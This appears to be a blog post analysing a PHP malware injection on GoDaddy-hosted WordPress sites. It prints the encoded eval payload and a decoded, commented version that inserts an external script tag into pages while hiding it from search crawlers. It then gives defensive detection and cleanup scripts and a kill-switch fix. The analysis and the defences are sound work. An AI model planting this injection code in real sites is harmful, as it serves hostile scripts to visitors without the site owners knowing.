Godaddy PHP sites hacked again

During April-May of this year, hackers attacked sites on GoDaddy shared hosting.
It seems they are back at work now: in the past 2-3, more sites (mostly WordPress blogs) have again been hacked by the same attackers.

Many sites hosted by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack, but fortunately I found the solution and have since moved my hosting as well.

The malware automatically edits itself into .php files: it picks files and pastes its code into them.

The injected code looks as below (this is only part of the code, not the full code):

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM
oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm
dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g
YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV
qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC
FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2
MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....

This code behaves as follows:
The base64 string decodes to the PHP code shown in the snippet below, and eval() executes that code.

<?php
// Decoded payload. It runs once per request: the mr_no global is a re-entry
// guard, and it is also the kill switch that the $GLOBALS['mr_no'] trick later
// in this post relies on.
if(function_exists('ob_start') && !isset($GLOBALS['mr_no']))
{
  $GLOBALS['mr_no']=1;
  if(!function_exists('mrobh'))
  {
    if(!function_exists('gml'))
    {
      // Returns the tag to inject, but stays silent for search-engine crawlers
      // so the injected content is not indexed (cloaking). The base64 string
      // decodes to a <script src="..."> tag loading from an external domain.
      function gml()
      {
        if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
        {
          return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9teWJsaW5kc3R1ZGlvaW5mb29ubGluZS5jb20vbGwucGhwIj48L3NjcmlwdD4=");
        }
        return "";
      }
    }
    if(!function_exists('gzdecode'))
    {
      // Polyfill for gzdecode() on PHP builds that lack it: walks the gzip
      // header (FLG bits: 4 = FEXTRA, 8 = FNAME, 16 = FCOMMENT, 2 = FHCRC) to
      // find the start of the deflate stream. Falls back to the raw input when
      // the buffered page was not gzip-compressed.
      function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
      {
        $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));   // FLG byte
        $RBE4C4D037E939226F65812885A53DAD9=10;   // fixed gzip header length
        $RA3D52E52A48936CDE0F5356BB08652F2=0;
        if($R30B2AB8DC1496D06B230A71D8962AF5D&4)
        {
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
          $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&8)
        {
          $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&16)
        {
          $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&2)
        {
          $RBE4C4D037E939226F65812885A53DAD9+=2;
        }
        $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
        if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
        {
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
        }
        return $R034AE2AB94F99CC81B389A1822DA3353;
      }
    }
    // Output-buffer callback: receives the finished page, decompresses it if
    // needed, and inserts the gml() tag just before </body> (or at the very
    // end when there is no </body>). The bogus "Content-Encoding: none" header
    // it sends is a side effect worth looking for in responses.
    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
    {
      Header('Content-Encoding: none');
      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
      if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE))
      {
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }
      else
      {
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    // From here on every byte the site prints passes through mrobh().
    ob_start('mrobh');
  }
}
?>
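The decoded code above changes what a visitor receives, not only what is on disk, so an infection can also be confirmed from the outside. The following is an added example (not code from the original post): it compares two responses for the same URL, one fetched with a browser-like User-Agent and one with a crawler User-Agent, and reports the symptoms mrobh() produces: an external script served only to browsers (the googlebot/yahoo cloaking in gml()) and the non-standard "Content-Encoding: none" header. It assumes you fetched the responses with any HTTP client; here both responses and the attacker.example domain are constructed sample data.

```php
<?php
// Added example: response-side check for the symptoms of the mrobh() output
// filter. Sample responses below are constructed; attacker.example is a placeholder.

// Collect the src attributes of external <script> tags in an HTML body.
function externalScripts(string $html): array
{
    preg_match_all('/<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']/i', $html, $m);
    return array_values(array_unique($m[1]));
}

// Compare a browser response with a crawler response for the same URL.
// Each response is ['headers' => [name => value], 'body' => html].
// Returns a list of findings; an empty array means nothing suspicious was seen.
function checkForInjection(array $browser, array $crawler): array
{
    $findings = [];

    // 1. Scripts served to browsers but hidden from search-engine crawlers (cloaking).
    $cloaked = array_diff(externalScripts($browser['body']), externalScripts($crawler['body']));
    foreach ($cloaked as $src) {
        $findings[] = "script cloaked from crawlers: $src";
    }

    // 2. mrobh() sends "Content-Encoding: none", which is not a valid encoding token.
    foreach ($browser['headers'] as $name => $value) {
        if (strcasecmp($name, 'Content-Encoding') === 0 && strcasecmp(trim($value), 'none') === 0) {
            $findings[] = 'non-standard header Content-Encoding: none';
        }
    }
    return $findings;
}

// Constructed sample: the crawler gets the clean page, the browser gets the
// page with a script tag inserted before </body>, as the callback does.
$page = "<html><head><script src=\"/wp-includes/js/jquery.js\"></script></head>"
      . "<body><h1>Blog</h1></body></html>";
$browserResponse = [
    'headers' => ['Content-Type' => 'text/html', 'Content-Encoding' => 'none'],
    'body'    => str_replace('</body>', "<script src=\"http://attacker.example/ll.php\"></script>\n</body>", $page),
];
$crawlerResponse = [
    'headers' => ['Content-Type' => 'text/html'],
    'body'    => $page,
];

foreach (checkForInjection($browserResponse, $crawlerResponse) as $finding) {
    echo "FINDING: $finding\n";
}
```

On the constructed input this prints two findings: the cloaked script and the bogus header. Against a real site, fetch the same page twice with the two User-Agents and pass the header and body of each response in; a clean site yields an empty list, because the script set does not depend on who is asking.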


Now, maybe PHP sites hosted on servers other than GoDaddy's should also be checked for this malware.

If you are infected with this malware, run the script from this post and your site will be cured in a moment.

You can also use the same script to verify whether your site was infected. If you get a message such as:

0 Infected Files ./
0 Infected Files ./

...then your site is clean. If instead you get a list of infected files, click on "Fix files" and within a few seconds your site is cleaned of this malware.
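The check-and-fix script referred to above is not reproduced in the post. As an added example (not that script and not code from the original post), here is a scanner that does the same two jobs for the injection shown earlier: it walks a directory tree, finds eval(base64_decode("...")) statements in .php files, decodes the payload to confirm it is this family (the decoded code carries the mr_no, mrobh and ob_start markers), and in fix mode strips the statement and keeps a backup. It assumes the injection is a single eval(base64_decode("...")) statement; the temporary directory, file contents and stand-in payload in the demo are constructed sample data.

```php
<?php
// Added example, not the script the post links to: scan for and strip the
// eval(base64_decode("...")) injection of the mr_no/mrobh family.
// Demo files and the stand-in payload below are constructed sample data.

const INJECTION_RE = '/\s*eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+\/=\s]+)["\']\s*\)\s*\)\s*;?/';
const FAMILY_MARKERS = ['mr_no', 'mrobh', 'ob_start'];

// True when the base64 payload decodes to this malware family.
function isMrNoPayload(string $b64): bool
{
    $decoded = base64_decode(preg_replace('/\s+/', '', $b64), true);
    if ($decoded === false) {
        return false;
    }
    foreach (FAMILY_MARKERS as $marker) {
        if (strpos($decoded, $marker) === false) {
            return false;
        }
    }
    return true;
}

// Strip every matching injection from PHP source; returns [cleaned source, count].
function cleanSource(string $source): array
{
    $count = 0;
    $clean = preg_replace_callback(INJECTION_RE, function (array $m) use (&$count) {
        if (!isMrNoPayload($m[1])) {
            return $m[0];   // some other base64 eval: leave it for manual review
        }
        $count++;
        return '';          // drop only the eval statement, keep the file's own code
    }, $source);
    return [$clean, $count];
}

// Walk $root and report infected .php files; rewrite them when $fix is true.
function scanTree(string $root, bool $fix = false): array
{
    $infected = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        [$clean, $count] = cleanSource(file_get_contents($path));
        if ($count === 0) {
            continue;
        }
        $infected[$path] = $count;
        if ($fix) {
            copy($path, $path . '.infected.bak');   // keep the evidence before rewriting
            file_put_contents($path, $clean);
        }
    }
    return $infected;
}

// --- Demo on constructed sample files in a temporary directory ---
$root = sys_get_temp_dir() . '/mrno_demo_' . getmypid();
mkdir($root);
// Constructed stand-in payload: carries the family markers but does nothing.
$payload = base64_encode("if(function_exists('ob_start')&&!isset(\$GLOBALS['mr_no'])){ function mrobh(\$b){return \$b;} }");
file_put_contents("$root/index.php", "<?php eval(base64_decode(\"$payload\")); ?>\n<?php\necho 'site code';\n");
file_put_contents("$root/clean.php", "<?php\necho 'untouched';\n");

$report = scanTree($root);                       // dry run: list only
foreach ($report as $path => $n) {
    echo "$n injection(s) in $path\n";
}
echo count($report) . " Infected Files $root\n";

scanTree($root, true);                           // fix mode: rewrite, keep .infected.bak
echo count(scanTree($root)) . " Infected Files $root (after fix)\n";

array_map('unlink', glob("$root/*"));            // tidy up the demo directory
rmdir($root);
```

Run it once without fix mode and read the list before rewriting anything. The scanner deliberately leaves base64 evals whose payload lacks the family markers in place, since a site may carry other obfuscated code (legitimate or not) that deserves a look rather than an automatic edit. Move the .infected.bak files out of the document root afterwards so the web server cannot serve the injected code as text.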

Thanks to Blog Tips for this trick.

Another solution, which I have just made and which is working for me and some other sites:

Create one file which gets included in your script as the very first file. Be sure that no other code is placed before this file inclusion.

In this file write the code below:

<?php
  $GLOBALS['mr_no'] = 1;
?>

Save this file and upload it to your server. This prevents the malware code from being executed; check the very first condition of that code, which bails out as soon as $GLOBALS['mr_no'] is already set.

Best of luck….

Written by Avinash

Avinash Zala is leading various projects which deals with the various technology involved with the web. A combination of perfect technical and management skills. Avinash would like to chat with you and convert your imagination into the working system. You can get in touch with him on Facebook and Twitter.
